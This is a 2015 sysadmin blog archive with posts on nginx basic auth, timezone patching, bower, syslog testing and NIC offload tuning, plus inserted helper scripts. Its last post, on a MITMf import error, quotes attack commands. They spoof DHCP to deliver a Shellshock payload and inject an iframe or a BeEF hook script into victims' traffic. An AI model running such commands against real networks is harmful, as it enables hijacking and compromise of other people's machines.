Monday, October 26, 2015

nginx: reverse proxy with basic authentication

/etc/nginx/sites-enabled/default:

server {
...

    location /web/x/ {
        proxy_pass http://127.0.0.1:8080/;
        auth_basic "Restricted";
        auth_basic_user_file /etc/nginx/.htpasswd;
    }
...
}

Two things to keep in mind with this block. The trailing slash in proxy_pass makes nginx strip the matched /web/x/ prefix, so the backend sees requests for / rather than /web/x/. Basic authentication only base64-encodes the user name and password in the Authorization header that the browser then attaches to every request, so serve this location over HTTPS only; on a plain-HTTP listener anyone on the path can read the credentials. The .htpasswd file should be readable by the nginx worker user and nobody else.
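What nginx actually does with that header, as an added example that is not part of the original post or of nginx itself: decode the Basic credential, look the user up in an htpasswd file and verify the stored hash in constant time. The htpasswd entry uses nginx's {SHA} scheme only because it needs no external library; it is unsalted SHA-1, so for a real file generate entries with the htpasswd tool from httpd-tools (default $apr1$ scheme) or `openssl passwd -apr1`. The user name, password and header below are constructed for the demo.

```python
"""Added example: Basic-auth verification the way nginx's auth_basic does it.
Not from the original post; sample credentials are constructed here."""
import base64
import binascii
import hashlib
import hmac


def sha_entry(user, password):
    """Build an htpasswd line in nginx's {SHA} format (unsalted SHA-1, base64).
    Demo-only scheme: prefer htpasswd/$apr1$ entries for a real file."""
    digest = hashlib.sha1(password.encode("utf-8")).digest()
    return "%s:{SHA}%s" % (user, base64.b64encode(digest).decode("ascii"))


def basic_header(user, password):
    """What a client sends: 'Basic ' + base64(user:password). No encryption."""
    raw = ("%s:%s" % (user, password)).encode("utf-8")
    return "Basic " + base64.b64encode(raw).decode("ascii")


def load_htpasswd(text):
    """Map user -> stored hash, skipping blank and comment lines."""
    users = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, stored = line.partition(":")
        users[user] = stored
    return users


def decode_basic(header_value):
    """Turn 'Basic dXNlcjpwYXNz' into (user, password), or None if malformed."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None


def check_password(stored, password):
    """Verify a password against a {SHA} entry without leaking timing.
    Other schemes ($apr1$, crypt) would need crypt(3); they are rejected here."""
    if not stored.startswith("{SHA}"):
        return False
    expected = stored[len("{SHA}"):].encode("ascii", "replace")
    actual = base64.b64encode(hashlib.sha1(password.encode("utf-8")).digest())
    return hmac.compare_digest(expected, actual)


def authenticate(header_value, htpasswd_text):
    """Return the authenticated user name, or None (nginx answers 401 with
    WWW-Authenticate: Basic realm="Restricted" in that case)."""
    creds = decode_basic(header_value)
    if creds is None:
        return None
    user, password = creds
    stored = load_htpasswd(htpasswd_text).get(user)
    if stored is None:
        # hash anyway so an unknown user is not measurably faster than a wrong password
        check_password("{SHA}AAAAAAAAAAAAAAAAAAAAAAAAAAA=", password)
        return None
    return user if check_password(stored, password) else None


if __name__ == "__main__":
    htpasswd = sha_entry("alice", "s3cret") + "\n"   # constructed sample of .htpasswd
    print(authenticate(basic_header("alice", "s3cret"), htpasswd))  # alice
    print(authenticate(basic_header("alice", "wrong"), htpasswd))   # None
```

Run it with no arguments; the two print lines show an accepted and a rejected credential. The point of decode_basic is the one a practitioner should remember: the token is reversible base64, which is why the location above must only be served over TLS.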

Tuesday, October 20, 2015

linux, freebsd: what to do on a server for the end of daylight saving time on 8 November (switch to winter time)

What needs to be done on the server for the 8 November 2015 switch to winter time (end of daylight saving time):

Even if you use an NTP server you still have to apply the patch. NTP only distributes UTC; the moment at which local time switches between summer and winter time comes from the zoneinfo rules stored on the host.

Red Hat Linux winter time: steps taken on RHEL 6.5

If you have a Red Hat 6 based system, the rpm installation below will do the job. If you have a Red Hat 7 based system you must install the matching rpm for that release. After installing the patch, also confirm that the system is in the correct timezone so that it picks up the automatic time change. (See: http://siyahsapkaorg.blogspot.com.tr/2015/10/linux-how-to-get-timezone-information.html)

[root@node1 ~]# rpm -Uvh http://mirror.centos.org/centos/6/updates/x86_64/Packages/tzdata-2015g-2.el6.noarch.rpm
Retrieving http://mirror.centos.org/centos/6/updates/x86_64/Packages/tzdata-2015g-2.el6.noarch.rpm
warning: /var/tmp/rpm-tmp.pTNoiM: Header V3 RSA/SHA1 Signature, key ID c105b9de: NOKEY
Preparing...                ########################################### [100%]
   1:tzdata                 ########################################### [100%]

The NOKEY warning means rpm could not check the package signature because the CentOS 6 signing key is not imported, and rpm -Uvh installs anyway. Import the RPM-GPG-KEY-CentOS-6 key with rpm --import first (or verify the downloaded file with rpm -K) so that a package pulled from a mirror over plain HTTP is actually authenticated; on a subscribed RHEL host simply run yum update tzdata, which delivers the same data through the erratum linked below.

[root@node1 ~]# zdump -c 2015,2016 -v "Europe/Istanbul"
Europe/Istanbul  -9223372036854775808 = NULL
Europe/Istanbul  -9223372036854689408 = NULL
Europe/Istanbul  Sun Mar 29 00:59:59 2015 UTC = Sun Mar 29 02:59:59 2015 EET isdst=0 gmtoff=7200
Europe/Istanbul  Sun Mar 29 01:00:00 2015 UTC = Sun Mar 29 04:00:00 2015 EEST isdst=1 gmtoff=10800
Europe/Istanbul  Sun Nov  8 00:59:59 2015 UTC = Sun Nov  8 03:59:59 2015 EEST isdst=1 gmtoff=10800
Europe/Istanbul  Sun Nov  8 01:00:00 2015 UTC = Sun Nov  8 03:00:00 2015 EET isdst=0 gmtoff=7200
Europe/Istanbul  9223372036854689407 = NULL
Europe/Istanbul  9223372036854775807 = NULL



https://rhn.redhat.com/errata/RHEA-2015-1863.html

https://bugs.launchpad.net/ubuntu/+source/tzdata/+bug/1503560


https://phoneboy.com/1381/use-ntp-you-still-need-daylight-saving-time-patches/ 

FreeBSD winter time: steps taken on an 8.3 x86_64 system:


As a precaution, back up the old zoneinfo files (the original post tarred a non-existent zoneinfo-backup directory; the live directory is what needs saving)

# tar -pczf zoneinfo-backup.tgz /usr/share/zoneinfo

Find the path of the zone file in use

We will replace this file with the current one.

# ls -al /etc/localtime
lrwxr-xr-x  1 root  wheel  35 Jun 11  2014 /etc/localtime -> /usr/share/zoneinfo/Europe/Istanbul



# pwd
/root
# mkdir tz

# cd tz
# wget --retr-symlinks 'ftp://ftp.iana.org/tz/tz*-latest.tar.gz'
# gzip -dc tzcode-latest.tar.gz | tar -xf -
# gzip -dc tzdata-latest.tar.gz | tar -xf -
# make TOPDIR=/root/tz install

IANA publishes detached .asc signatures next to these tarballs and serves them over https as well (https://data.iana.org/time-zones/); fetch them that way and check the signature before building, since an unauthenticated FTP download is exactly the kind of file you do not want to compile and install as root. With TOPDIR set as above, make installs the compiled zone files under /root/tz/etc/zoneinfo rather than over the system copies, which is why the next step copies the one file we need.


Update the zone file

# cp /root/tz/etc/zoneinfo/Europe/Istanbul /usr/share/zoneinfo/Europe/Istanbul


and finally run the checks (in the zdump output the four 2015 rows are the ones to verify: EET to EEST on 29 March and EEST back to EET at 01:00 UTC on 8 November; the rows before and after them are the cutoff boundaries, which this old zdump prints with nonsense dates):

# date "+%Z %z"
EEST +0300


# zdump -c 2015,2016 -v /etc/localtime
/etc/localtime  Sun Jan  0 00:00:00 1900 UTC = Sun Jan  0 00:00:00 1900 LMT isdst=0 gmtoff=0
/etc/localtime  Sun Jan  0 00:00:00 1900 UTC = Sun Jan  0 00:00:00 1900 LMT isdst=0 gmtoff=0
/etc/localtime  Sun Mar 29 00:59:59 2015 UTC = Sun Mar 29 02:59:59 2015 EET isdst=0 gmtoff=7200
/etc/localtime  Sun Mar 29 01:00:00 2015 UTC = Sun Mar 29 04:00:00 2015 EEST isdst=1 gmtoff=10800
/etc/localtime  Sun Nov  8 00:59:59 2015 UTC = Sun Nov  8 03:59:59 2015 EEST isdst=1 gmtoff=10800
/etc/localtime  Sun Nov  8 01:00:00 2015 UTC = Sun Nov  8 03:00:00 2015 EET isdst=0 gmtoff=7200
/etc/localtime  Thu Dec 31 15:00:00 2015 UTC = Sat Dec  3 17:30:07 219250468 EET isdst=0 gmtoff=7200
/etc/localtime  Sat Dec  3 17:30:07 219250468 UTC = Sun Dec  4 17:30:07 219250468 EET isdst=0 gmtoff=7200 
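Both checks above lean on the zdump binary, and the FreeBSD one prints garbage at the boundaries. The following is an added example, not part of the original post or of the tz project: a minimal reader for the TZif format used by /etc/localtime and /usr/share/zoneinfo/*, printing one year's transitions the way zdump -v does. Run it as `python3 tzif_check.py /etc/localtime` on the patched host (the file name is an assumption); with no argument it parses a TZif blob constructed in the script that holds only the two 2015 Europe/Istanbul transitions, so it also runs offline. Note that from tzdata 2016h onwards Europe/Istanbul stays on +03 all year, so on a current system later years show no transitions at all.

```python
"""Added example: TZif (zoneinfo) reader that lists the DST transitions of one
year like `zdump -v`. Not from the original post; the sample blob is constructed."""
import struct
import sys
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# TZif header: magic, version byte, 15 reserved bytes, then six big-endian counts
# (isutcnt, isstdcnt, leapcnt, timecnt, typecnt, charcnt).
HEADER = struct.Struct(">4sc15x6l")


def _parse_block(data, off, tsize):
    """Parse one data block (v1 uses 4-byte times; v2+ files append an 8-byte block).
    Returns (version, [(utc_epoch, utoff, isdst, abbr)], offset after the block)."""
    magic, version, isutcnt, isstdcnt, leapcnt, timecnt, typecnt, charcnt = HEADER.unpack_from(data, off)
    if magic != b"TZif":
        raise ValueError("not a TZif file")
    off += HEADER.size
    times = struct.unpack_from(">%d%s" % (timecnt, "q" if tsize == 8 else "l"), data, off)
    off += tsize * timecnt
    idx = data[off:off + timecnt]          # one type index per transition
    off += timecnt
    types = [struct.unpack_from(">lBB", data, off + 6 * i) for i in range(typecnt)]
    off += 6 * typecnt
    chars = data[off:off + charcnt]        # NUL-terminated abbreviations (EET, EEST, ...)
    off += charcnt
    off += leapcnt * (tsize + 4) + isstdcnt + isutcnt   # leap records and indicator flags, skipped
    transitions = []
    for t, i in zip(times, idx):
        utoff, isdst, desig = types[i]
        abbr = chars[desig:chars.index(b"\0", desig)].decode("ascii")
        transitions.append((t, utoff, bool(isdst), abbr))
    return version, transitions, off


def parse_tzif(data):
    """Prefer the 64-bit block when present: 'slim' files written by newer zic
    may leave the 32-bit block empty."""
    version, transitions, end = _parse_block(data, 0, 4)
    if version >= b"2":
        _, transitions, _ = _parse_block(data, end, 8)
    return transitions


def transitions_in_year(data, year):
    """zdump-style rows for each transition in `year`: the UTC instant, the new
    local time, abbreviation, isdst flag and gmtoff."""
    start = int((datetime(year, 1, 1, tzinfo=timezone.utc) - EPOCH).total_seconds())
    end = int((datetime(year + 1, 1, 1, tzinfo=timezone.utc) - EPOCH).total_seconds())
    rows = []
    for t, utoff, isdst, abbr in parse_tzif(data):
        if not start <= t < end:           # also skips the huge sentinel times in real files
            continue
        utc = EPOCH + timedelta(seconds=t)
        local = utc + timedelta(seconds=utoff)
        rows.append({"utc": utc.strftime("%Y-%m-%d %H:%M:%S"),
                     "local": local.strftime("%Y-%m-%d %H:%M:%S"),
                     "abbr": abbr, "isdst": isdst, "gmtoff": utoff})
    return rows


def build_sample_tzif():
    """Constructed TZif v1 blob with only the two 2015 Europe/Istanbul
    transitions (EET +0200 <-> EEST +0300), so the script works offline."""
    times = [1427590800, 1446944400]        # 2015-03-29 01:00Z and 2015-11-08 01:00Z
    types = [(7200, 0, 0), (10800, 1, 4)]   # (utoff, isdst, offset into chars)
    idx = bytes([1, 0])                     # March -> EEST, November -> EET
    chars = b"EET\0EEST\0"
    hdr = HEADER.pack(b"TZif", b"\0", 0, 0, 0, len(times), len(types), len(chars))
    body = struct.pack(">%dl" % len(times), *times) + idx
    body += b"".join(struct.pack(">lBB", *t) for t in types)
    return hdr + body + chars


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None   # e.g. /etc/localtime
    data = open(path, "rb").read() if path else build_sample_tzif()
    for row in transitions_in_year(data, 2015):
        print("%(utc)s UTC = %(local)s %(abbr)s isdst=%(isdst)d gmtoff=%(gmtoff)d" % row)
```

On a correctly patched host the second 2015 row must read 2015-11-08 01:00:00 UTC = 2015-11-08 03:00:00 EET; an unpatched 2015 file still shows the change on 25 October.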



Time zone setting for the Java Virtual Machine:

java-1.7.0-openjdk-1.7.0.55-2.4.7.1.0.1.el6_5.x86_64
 
# export TZ=Europe/Istanbul ; java -jar /tmp/hede.jar ; date "+%Z%z %F %T"
Tue Oct 27 13:43:56 EEST 2015
Europe/Istanbul
Current time in milliseconds = 1445942636596 => Tue Oct 27 13:43:56 EEST 2015
Current time zone: Europe/Istanbul
EEST+0300 2015-10-27 13:43:56

http://www.java-examples.com/get-current-timezone-using-java-calendar

The JVM carries its own copy of the zone rules and does not read /usr/share/zoneinfo. If you use OpenJDK, copy the time zone files produced by the Oracle JDK tzupdater method into the /usr/share/javazi/ directory. In the runs below, the unpatched JVM still reports EET on 27 October (it applies the old rule that ended DST on 25 October) and reports EEST, correctly, after the copy.

$ java -jar get-time-zone.jar
Tue Oct 27 15:21:28 EET 2015
Europe/Istanbul
Current time in milliseconds = 1445952088773 => Tue Oct 27 15:21:28 EET 2015
Current time zone: Europe/Istanbul

$ sudo cp -pfr openjdk/javazi/* /usr/share/javazi/

$ java -jar get-time-zone.jar
Tue Oct 27 16:22:02 EEST 2015
Europe/Istanbul
Current time in milliseconds = 1445952122068 => Tue Oct 27 16:22:02 EEST 2015
Current time zone: Europe/Istanbul


$ ls openjdk/javazi/
Africa   Antarctica  Atlantic   CET      EET  EST5EDT  Europe  HST     MET  MST7MDT  PST8PDT  WET
America  Asia        Australia  CST6CDT  EST  Etc      GMT     Indian  MST  Pacific  SystemV  ZoneInfoMappings

Thursday, October 15, 2015

how to install bigvideo.js with bower on centos 6.5

# yum install npm 
 
# npm install -g bower
 
-bash-4.1$ bower install BigVideo.js
bower jquery#>=1.7.2            cached git://github.com/jquery/jquery.git#2.1.4
bower jquery#>=1.7.2          validate 2.1.4 against git://github.com/jquery/jquery.git#>=1.7.2
bower jquery-ui#>=1.8.22        cached git://github.com/components/jqueryui.git#1.11.4
bower jquery-ui#>=1.8.22      validate 1.11.4 against git://github.com/components/jqueryui.git#>=1.8.22
bower video.js#>=3.2.0          cached git://github.com/videojs/video.js.git#5.0.0
bower video.js#>=3.2.0        validate 5.0.0 against git://github.com/videojs/video.js.git#>=3.2.0
bower imagesloaded#>=2.1.1      cached git://github.com/desandro/imagesloaded.git#3.1.8
bower imagesloaded#>=2.1.1    validate 3.1.8 against git://github.com/desandro/imagesloaded.git#>=2.1.1
bower BigVideo.js#*             cached git://github.com/dfcb/BigVideo.js.git#1.1.5
bower BigVideo.js#*           validate 1.1.5 against git://github.com/dfcb/BigVideo.js.git#*
bower jquery#>=1.6              cached git://github.com/jquery/jquery.git#2.1.4
bower jquery#>=1.6            validate 2.1.4 against git://github.com/jquery/jquery.git#>=1.6
bower eventEmitter#4.x          cached git://github.com/Olical/EventEmitter.git#4.3.0
bower eventEmitter#4.x        validate 4.3.0 against git://github.com/Olical/EventEmitter.git#4.x
bower eventie#>=1.0.4 <2        cached git://github.com/desandro/eventie.git#1.0.6
bower eventie#>=1.0.4 <2      validate 1.0.6 against git://github.com/desandro/eventie.git#>=1.0.4 <2
bower imagesloaded#>=2.1.1     install imagesloaded#3.1.8
bower video.js#>=3.2.0         install video.js#5.0.0
bower jquery-ui#>=1.8.22       install jquery-ui#1.11.4
bower jquery#>=1.7.2           install jquery#2.1.4
bower BigVideo#~1.1.5          install BigVideo#1.1.5
bower eventEmitter#4.x         install eventEmitter#4.3.0
bower eventie#>=1.0.4 <2       install eventie#1.0.6

imagesloaded#3.1.8 bower_components/imagesloaded
├── eventEmitter#4.3.0
└── eventie#1.0.6

video.js#5.0.0 bower_components/video.js

jquery-ui#1.11.4 bower_components/jquery-ui
└── jquery#2.1.4

jquery#2.1.4 bower_components/jquery

BigVideo#1.1.5 bower_components/BigVideo
├── imagesloaded#3.1.8
├── jquery#2.1.4
├── jquery-ui#1.11.4
└── video.js#5.0.0

eventEmitter#4.3.0 bower_components/eventEmitter

eventie#1.0.6 bower_components/eventie 

linux: how to get timezone information


The timezone information is stored in the /etc/localtime file.
This file is in binary (TZif) format; the printable strings inside a binary file, here the zone abbreviations, can be examined with the strings command.

$ strings /etc/localtime | more


Finding the time zone by comparing the contents of /etc/localtime with the installed zone files (diff -q compares content, not size; a name match means the same compiled rules):

$ cd /usr/share/zoneinfo
$ find * -type f -exec sh -c "diff -q /etc/localtime '{}' > /dev/null && echo {}" \;

On systems where /etc/localtime is a symlink, as on the FreeBSD box above, readlink -f /etc/localtime gives the answer directly; RHEL 6 also records the configured zone in /etc/sysconfig/clock.


Finding the time zone with the date command:

$ date +'%:z %Z'

Wednesday, October 14, 2015

linux shell: how to run bash command with timeout

bash$     (date >> /tmp/bw.log ; vnstat -l -i bond0 &>> /tmp/bw.log) & sleep 5 ; kill $!
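The one-liner above has a catch: $! is the PID of the background subshell, so kill hits the subshell while vnstat, its child, can keep running. The coreutils timeout command (`timeout 5 vnstat -l -i bond0`, available on RHEL 6) avoids that. For scripts, the following is an added example that is not part of the original post: it runs a command in its own process group and, on timeout, signals the whole group, escalating to SIGKILL if needed, and still returns whatever output was produced before the deadline. The commands in the demo are constructed stand-ins for the vnstat case.

```python
"""Added example: run a command with a hard timeout and kill its whole process
group, not just the parent. Standard library only; not from the original post."""
import os
import signal
import subprocess


def run_with_timeout(cmd, seconds, grace=2):
    """Run `cmd` (argv list) and return (timed_out, exit_status, stdout_text).
    start_new_session puts the child in its own session and process group, so
    pid == pgid and one killpg() reaches every process the command spawned."""
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                            start_new_session=True)
    try:
        out, _ = proc.communicate(timeout=seconds)
        return False, proc.returncode, out.decode(errors="replace")
    except subprocess.TimeoutExpired:
        os.killpg(proc.pid, signal.SIGTERM)
        try:
            # communicate() keeps the output already read before the timeout
            out, _ = proc.communicate(timeout=grace)
        except subprocess.TimeoutExpired:
            os.killpg(proc.pid, signal.SIGKILL)   # command ignored SIGTERM
            out, _ = proc.communicate()
        return True, proc.returncode, out.decode(errors="replace")


if __name__ == "__main__":
    # a parent shell spawning a long-running child, like the vnstat case above
    print(run_with_timeout(["sh", "-c", "echo started; sleep 30; echo never"], 1))
    print(run_with_timeout(["sh", "-c", "echo quick"], 5))
```

The first call returns after one second with timed_out set, the "started" line captured and the sleep child gone; the second returns normally with exit status 0.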

linux shell: using the paste command

$ cat testfile
A 1
B 2
C 3
D 4
E 5
F 6
G 7
H 8
I 9
J 10

$ cut -d' ' -f2 testfile
1
2
3
4
5
6
7
8
9
10

$ cut -d' ' -f2 testfile | paste -d, - -
1,2
3,4
5,6
7,8
9,10


Keywords: how to parse and group lines, how to convert lines to columns, how to  convert rows to columns

Thursday, October 8, 2015

bash: how to send syslog test message

echo "<133>$0[$$]: Test syslog message from Netcat" | nc -w1 -u 192.168.1.254 1501
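The <133> prefix is the RFC 3164 PRI field: facility * 8 + severity, so 133 is local0 (16) with severity notice (5); $0[$$] supplies the tag and process id, and nc -u sends a single UDP datagram. The following is an added example, not part of the original post: it builds the same kind of message, sends it over UDP and parses the PRI back into facility and severity names. To keep it runnable offline it receives its own datagram on a localhost socket; point send_syslog at the collector (192.168.1.254 port 1501 in the one-liner) for a real test. The sshd message in the test is constructed.

```python
"""Added example: RFC 3164 syslog test message over UDP, with PRI encode/decode.
Not from the original post; sample messages are constructed."""
import os
import re
import socket
import sys
import time

FACILITIES = {"kern": 0, "user": 1, "mail": 2, "daemon": 3, "auth": 4, "syslog": 5,
              "lpr": 6, "news": 7, "uucp": 8, "cron": 9, "authpriv": 10, "ftp": 11,
              "local0": 16, "local1": 17, "local2": 18, "local3": 19,
              "local4": 20, "local5": 21, "local6": 22, "local7": 23}
SEVERITIES = {"emerg": 0, "alert": 1, "crit": 2, "err": 3, "warning": 4,
              "notice": 5, "info": 6, "debug": 7}
FAC_BY_NUM = {v: k for k, v in FACILITIES.items()}
SEV_BY_NUM = {v: k for k, v in SEVERITIES.items()}
PRI_RE = re.compile(r"^<(\d{1,3})>(.*)$", re.S)


def priority(facility, severity):
    """PRI = facility * 8 + severity; local0.notice gives the post's <133>."""
    return FACILITIES[facility] * 8 + SEVERITIES[severity]


def build_message(facility, severity, tag, msg, pid=None, when=None):
    """<PRI>TIMESTAMP HOSTNAME TAG[PID]: MSG in RFC 3164 layout. The tag mirrors
    the shell's $0[$$]; the day of month is space-padded as the RFC requires."""
    pid = os.getpid() if pid is None else pid
    lt = time.localtime(when)
    stamp = "%s %2d %02d:%02d:%02d" % (time.strftime("%b", lt), lt.tm_mday,
                                        lt.tm_hour, lt.tm_min, lt.tm_sec)
    return "<%d>%s %s %s[%d]: %s" % (priority(facility, severity), stamp,
                                      socket.gethostname(), tag, pid, msg)


def parse_pri(message):
    """Return (facility_name, severity_name, rest), or None if no valid PRI
    (the largest legal value is local7.debug = 191)."""
    m = PRI_RE.match(message)
    if not m or int(m.group(1)) > 191:
        return None
    pri = int(m.group(1))
    return FAC_BY_NUM[pri // 8], SEV_BY_NUM[pri % 8], m.group(2)


def send_syslog(message, host, port):
    """UDP gives no delivery confirmation: a 'successful' send only proves the
    datagram left this host, so always confirm on the collector side as well."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(message.encode("utf-8"), (host, port))


def loopback_roundtrip(message):
    """Offline demo: receive our own datagram on an ephemeral localhost port."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as rx:
        rx.bind(("127.0.0.1", 0))
        rx.settimeout(2)
        send_syslog(message, *rx.getsockname())
        return rx.recv(2048).decode("utf-8")


if __name__ == "__main__":
    msg = build_message("local0", "notice", sys.argv[0], "Test syslog message from Python")
    print(msg)
    print(parse_pri(loopback_roundtrip(msg)))
```

Parsing the PRI on the receiving side is the check worth keeping: a collector that files a test message under the wrong facility will also file real auth or kern events wrongly, and nothing in the sending one-liner would reveal that.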

Linux: how to optimize an ethernet adapter settings

 Platform:

Red Hat Enterprise Linux Server release 6.5 (Santiago)



how to find ethernet device driver details

# ethtool -i eth1
driver: igb
version: 5.2.5
firmware-version: 2.1.0
bus-info: 0000:01:00.1
supports-statistics: yes
supports-test: yes
supports-eeprom-access: yes
supports-register-dump: yes
supports-priv-flags: no


# lspci -v | grep -A 14 '01:00.1'
01:00.1 Ethernet controller: Intel Corporation 82575EB Gigabit Network Connection (rev 02)
        Subsystem: Intel Corporation Device 34de
        Flags: bus master, fast devsel, latency 0, IRQ 28
        Memory at b1a00000 (32-bit, non-prefetchable) [size=128K]
        I/O ports at 1000 [size=32]
        Memory at b1a40000 (32-bit, non-prefetchable) [size=16K]
        Capabilities: [40] Power Management version 2
        Capabilities: [50] MSI: Enable- Count=1/1 Maskable- 64bit+
        Capabilities: [60] MSI-X: Enable+ Count=10 Masked-
        Capabilities: [a0] Express Endpoint, MSI 00
        Capabilities: [100] Advanced Error Reporting
        Capabilities: [140] Device Serial Number 00-1e-67-ff-ff-0c-9a-29
        Kernel driver in use: igb
        Kernel modules: igb



how to list the ethernet adapters

[root@inseptra ~]# lspci  | grep Ethernet
01:00.0 Ethernet controller: Intel Corporation 82575EB Gigabit Network Connection (rev 02)
01:00.1 Ethernet controller: Intel Corporation 82575EB Gigabit Network Connection (rev 02)
02:00.0 Ethernet controller: Intel Corporation I350 Gigabit Network Connection (rev 01)
02:00.1 Ethernet controller: Intel Corporation I350 Gigabit Network Connection (rev 01)



how to find the supported RX / TX ring buffer sizes of an ethernet adapter

# ethtool -g eth1
Ring parameters for eth1:
Pre-set maximums:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096
Current hardware settings:
RX:             256
RX Mini:        0
RX Jumbo:       0
TX:             256



how to change the rx / tx ring buffer settings of an ethernet adapter

Larger rings give the driver more room to absorb bursts before packets are dropped (the overruns counted by ifconfig and ethtool -S); the cost is a little more memory and latency, and the driver re-initializes the queues when the size changes, so do it during a quiet moment.

# ethtool -G eth1 rx 4096 tx 4096
# ethtool -g eth1
Ring parameters for eth1:
Pre-set maximums:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096
Current hardware settings:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096



how to change ethernet features to increase ids/ips packet processing performance

Offloads let the NIC, or the kernel's generic equivalents, merge or split segments and fill in checksums, so the capture path does not see what was on the wire: GRO and LRO hand the sniffer merged super-packets, and outgoing frames are captured before the hardware has written their checksums. Turn them off on a capture interface:

disable RX checksumming:
# ethtool -K eth1 rx off

disable TX checksumming:
# ethtool -K eth1 tx off

disable TCP segmentation offload:
# ethtool -K eth1 tso off

disable generic receive offload:
# ethtool -K eth1 gro off

disable generic segmentation offload:
# ethtool -K eth1 gso off

disable scatter-gather:
# ethtool -K eth1 sg off

These settings do not survive a reboot; on RHEL 6 put them in an ETHTOOL_OPTS line in /etc/sysconfig/network-scripts/ifcfg-eth1 or in a script run when the interface comes up.

how to show the features of an ethernet adapter

# ethtool -k eth1
Features for eth1:
rx-checksumming: on
tx-checksumming: on
        tx-checksum-ipv4: on
        tx-checksum-ip-generic: off [fixed]
        tx-checksum-ipv6: on
        tx-checksum-fcoe-crc: off [fixed]
        tx-checksum-sctp: off [fixed]
scatter-gather: on
        tx-scatter-gather: on
        tx-scatter-gather-fraglist: off [fixed]
tcp-segmentation-offload: on
        tx-tcp-segmentation: on
        tx-tcp-ecn-segmentation: off [fixed]
        tx-tcp6-segmentation: on
udp-fragmentation-offload: off [fixed]
generic-segmentation-offload: on
generic-receive-offload: on
large-receive-offload: off
rx-vlan-offload: on
tx-vlan-offload: on
ntuple-filters: off [fixed]
receive-hashing: on
highdma: on [fixed]
rx-vlan-filter: on [fixed]
vlan-challenged: off [fixed]
tx-lockless: off [fixed]
netns-local: off [fixed]
tx-gso-robust: off [fixed]
tx-fcoe-segmentation: off [fixed]
fcoe-mtu: off [fixed]
tx-nocache-copy: on
loopback: off [fixed]
rx-fcs: off [fixed]
rx-all: off [fixed]
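Reading that listing by eye on every sensor gets old, so here is an added example that is not part of the original post: it parses ethtool -k output, reports which of the offloads discussed above are still on, and emits the ethtool -K commands to turn them off, skipping features the driver marks [fixed] because those cannot be changed. Large-receive-offload is included alongside the six listed earlier since it merges segments in the same way GRO does. The sample text is the eth1 output shown on this page, embedded so the script runs offline; pass an interface name to run it against a live box.

```python
"""Added example: audit `ethtool -k` output for a capture interface and print
the `ethtool -K` fixes. Not from the original post; the sample is this page's eth1."""
import re
import subprocess
import sys

# feature name as printed by `ethtool -k`  ->  short name accepted by `ethtool -K`
CAPTURE_OFFLOADS = {
    "rx-checksumming": "rx",
    "tx-checksumming": "tx",
    "scatter-gather": "sg",
    "tcp-segmentation-offload": "tso",
    "generic-segmentation-offload": "gso",
    "generic-receive-offload": "gro",
    "large-receive-offload": "lro",
}

LINE_RE = re.compile(r"^(\s*)([\w-]+):\s+(on|off)(\s+\[(fixed|requested on|requested off)\])?\s*$")


def parse_ethtool_k(text):
    """Map each feature to {'on': bool, 'fixed': bool, 'sub': bool}.
    Indented lines are the hardware sub-features behind a toggle."""
    features = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue          # the "Features for eth1:" header and anything unexpected
        indent, name, state, _, flag = m.groups()
        features[name] = {"on": state == "on", "fixed": flag == "fixed", "sub": bool(indent)}
    return features


def audit(features):
    """Offloads that are enabled but should be off on a capture interface.
    Returns (can_disable, cannot_disable) as lists of ethtool -K short names."""
    can, cannot = [], []
    for longname, short in CAPTURE_OFFLOADS.items():
        f = features.get(longname)
        if f and f["on"]:
            (cannot if f["fixed"] else can).append(short)
    return can, cannot


def fix_commands(iface, features):
    """One `ethtool -K` invocation per change, so a failure is attributable."""
    can, _ = audit(features)
    return ["ethtool -K %s %s off" % (iface, short) for short in can]


SAMPLE = """Features for eth1:
rx-checksumming: on
tx-checksumming: on
        tx-checksum-ipv4: on
        tx-checksum-ip-generic: off [fixed]
scatter-gather: on
        tx-scatter-gather: on
tcp-segmentation-offload: on
        tx-tcp-segmentation: on
udp-fragmentation-offload: off [fixed]
generic-segmentation-offload: on
generic-receive-offload: on
large-receive-offload: off
rx-vlan-offload: on
ntuple-filters: off [fixed]
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        iface = sys.argv[1]
        text = subprocess.check_output(["ethtool", "-k", iface]).decode()
    else:
        iface, text = "eth1", SAMPLE
    feats = parse_ethtool_k(text)
    for cmd in fix_commands(iface, feats):
        print(cmd)
    stuck = audit(feats)[1]
    if stuck:
        print("# cannot be disabled on this driver: " + ", ".join(stuck))
```

Against the page's own listing it prints six commands (rx, tx, sg, tso, gso, gro) and nothing for lro, which is already off. Run the audit again after the changes and on every sensor rebuild; the [fixed] report tells you when the only remaining option is a different NIC.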



Keywords: eth0 overrun problem, eth0 drop problem, packet processing, ips, ids, suricata, snort, bro network security monitor, packet drop


2015-10-08 - Ali Okan Yuksel - yukselao@yandex.com




Sunday, October 4, 2015

mitmf: ImportError: cannot import name LOG


About mitmf:

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.
 
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
Inject an HTML IFrame using the Inject plugin:
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
Inject a JS script:
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js



Error:

Traceback (most recent call last):
  File "./mitmf.py", line 180, in <module>
    from core.protocols.smb.SMBserver import SMBserver
  File "/usr/share/mitmf/core/protocols/smb/SMBserver.py", line 5, in <module>
    from impacket import version, smbserver, LOG
